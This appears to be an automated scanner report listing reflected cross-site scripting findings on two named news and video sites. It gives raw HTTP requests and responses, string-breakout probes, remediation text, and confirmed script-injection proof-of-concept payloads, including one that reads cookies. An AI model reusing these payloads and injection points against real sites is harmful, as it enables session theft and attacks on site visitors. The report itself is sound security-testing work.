GET /articles/TopStories2f1c5'%3be61c15ecfb6/2010/11/23/Cambodian_festival_stampede_542577.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:36 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=7872D8042ACDBB84613364C19CDE2E05; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:36 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff80c"%3bac5cbfe6ab7 was submitted in the REST URL parameter 2. This input was echoed as ff80c";ac5cbfe6ab7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/TopStoriesff80c"%3bac5cbfe6ab7/2010/11/23/Cambodian_festival_stampede_542577.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:30 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=3254E0B9F64DBC796EC88107F1CD6BAF; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:30 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35c5"><a>51ff1ff1fdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/TopStoriesc35c5"><a>51ff1ff1fdb/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:12 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=5B770BFDE6B4D1870490201E1044E8B8; Path=/ Content-Language: en Content-Length: 55110 Expires: Tue, 23 Nov 2010 03:34:12 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/TopStoriesc35c5"><a>51ff1ff1fdb/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 794aa"%3bf430d19dc1f was submitted in the REST URL parameter 2. This input was echoed as 794aa";f430d19dc1f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/TopStories794aa"%3bf430d19dc1f/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:40 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=12E728B777D3FF86C4A17B68E76D1002; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:40 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6362d'%3bbbbc407be9d was submitted in the REST URL parameter 2. This input was echoed as 6362d';bbbc407be9d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/TopStories6362d'%3bbbbc407be9d/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:46 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=EE2D6EF8D430F292E55CA84A2143C74D; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:46 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 221a9"%3b5767cbd81c9 was submitted in the REST URL parameter 2. This input was echoed as 221a9";5767cbd81c9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/TopStories221a9"%3b5767cbd81c9/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:23 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=E60287088AE72C92D7CE89161789823A; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:23 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f5e2"><a>02af3db3003 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/TopStories6f5e2"><a>02af3db3003/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:28:57 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=D525844671DF567771F1AB0EED0C9233; Path=/ Content-Language: en Content-Length: 55110 Expires: Tue, 23 Nov 2010 03:33:57 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/TopStories6f5e2"><a>02af3db3003/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ea88'%3b660c157e775 was submitted in the REST URL parameter 2. This input was echoed as 7ea88';660c157e775 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/TopStories7ea88'%3b660c157e775/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:29 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=14DC333C04DAE99BEAEA3D8FC1A6296F; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:29 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd3c"><a>33929a8bf53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/TopStories3fd3c"><a>33929a8bf53/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:00 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=7E983353C7155553FE53450328F7263A; Path=/ Content-Language: en Content-Length: 55110 Expires: Tue, 23 Nov 2010 03:34:00 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/TopStories3fd3c"><a>33929a8bf53/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f5a5'%3b0b401fec75a was submitted in the REST URL parameter 2. This input was echoed as 1f5a5';0b401fec75a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/TopStories1f5a5'%3b0b401fec75a/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:32 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=090E04503B536208B9ACBA41DD2F14EC; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:32 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 303b0"%3b347ead3c2f was submitted in the REST URL parameter 2. This input was echoed as 303b0";347ead3c2f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/TopStories303b0"%3b347ead3c2f/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:26 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=EA6BE5AFBE75962C70515806E54C4A26; Path=/ Content-Language: en Content-Length: 55094 Expires: Tue, 23 Nov 2010 03:34:26 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f76aa"%3b13eb338e3e9 was submitted in the REST URL parameter 2. This input was echoed as f76aa";13eb338e3e9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/TopStoriesf76aa"%3b13eb338e3e9/2010/11/23/Robber_shot_dead_outside_hotel_542635.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:36 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=0D02AE5E4458A4914B6A6C96B6852E48; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:36 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf690"><a>2e3872849c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/TopStoriescf690"><a>2e3872849c8/2010/11/23/Robber_shot_dead_outside_hotel_542635.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:09 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=DB6FB417CE04803C4F4D87860BE19566; Path=/ Content-Language: en Content-Length: 55110 Expires: Tue, 23 Nov 2010 03:34:09 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/TopStoriescf690"><a>2e3872849c8/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e052f'%3b22e4d1e7c98 was submitted in the REST URL parameter 2. This input was echoed as e052f';22e4d1e7c98 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/TopStoriese052f'%3b22e4d1e7c98/2010/11/23/Robber_shot_dead_outside_hotel_542635.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:42 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=74D3D82AFE2BBC2D5BE07ECC82904208; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:42 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d19ae'%3b379348177ad was submitted in the REST URL parameter 2. This input was echoed as d19ae';379348177ad in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/TopStoriesd19ae'%3b379348177ad/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:37 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=49E13177096B14760D5B1945615096AB; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:37 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65fc7"><a>4405adf754f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/TopStories65fc7"><a>4405adf754f/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:06 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=C45921B75EFA678B23E38A9CF0D53E6F; Path=/ Content-Language: en Content-Length: 55110 Expires: Tue, 23 Nov 2010 03:34:06 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/TopStories65fc7"><a>4405adf754f/1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e64e"%3bf2afee16327 was submitted in the REST URL parameter 2. This input was echoed as 8e64e";f2afee16327 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/TopStories8e64e"%3bf2afee16327/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:29:32 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=909977F57BF254EEB7AF02A5B296CE0B; Path=/ Content-Language: en Content-Length: 55098 Expires: Tue, 23 Nov 2010 03:34:32 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51210"%3b0a4ecc94d38 was submitted in the REST URL parameter 2. This input was echoed as 51210";0a4ecc94d38 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/World51210"%3b0a4ecc94d38/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:35 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=72657DA3E5F961A271FA1F0127ED9820; Path=/ Content-Language: en Content-Length: 55078 Expires: Tue, 23 Nov 2010 03:35:35 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2567b'%3bb8257ae9769 was submitted in the REST URL parameter 2. This input was echoed as 2567b';b8257ae9769 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/World2567b'%3bb8257ae9769/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:40 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=262BF60E5EAD8AC08F11EE3E74368AD7; Path=/ Content-Language: en Content-Length: 55078 Expires: Tue, 23 Nov 2010 03:35:40 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0f7a"><a>4c37b037fcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /articles/Worldc0f7a"><a>4c37b037fcd/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:10 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=46A00AD74CAE0ACCB20E01D1AC71BA6E; Path=/ Content-Language: en Content-Length: 55090 Expires: Tue, 23 Nov 2010 03:35:10 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <link rel="stylesheet" href="/bphf/re ...[SNIP]... <a class="more-link" href="/latestarticles/Worldc0f7a"><a>4c37b037fcd/1"> ...[SNIP]...
The value of the bd5b1%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea21cf603a85 request parameter is copied into the HTML document as plain text between tags. The payload 86921<script>alert(1)</script>3c61eb56ad1 was submitted in the bd5b1%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea21cf603a85 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bd5b1%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea21cf603a85=186921<script>alert(1)</script>3c61eb56ad1 HTTP/1.1 Host: bigpondvideo.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=742f05fed231622424602a00ff82a961; s_cc=true; s_nr=1290483776704; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; gpv_p49=BigPond%20TV; gpv_e44=BigPond%20TV; s_sq=%5B%5BB%5D%5D; s_sv_sid=453774846568
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... </script>a21cf603a85=186921<script>alert(1)</script>3c61eb56ad1&navId=444&channelTitle=Videos&targetLevel=Videos.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.448. http://bigpondvideo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd5b1</script><script>alert(1)</script>a21cf603a85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?bd5b1</script><script>alert(1)</script>a21cf603a85=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
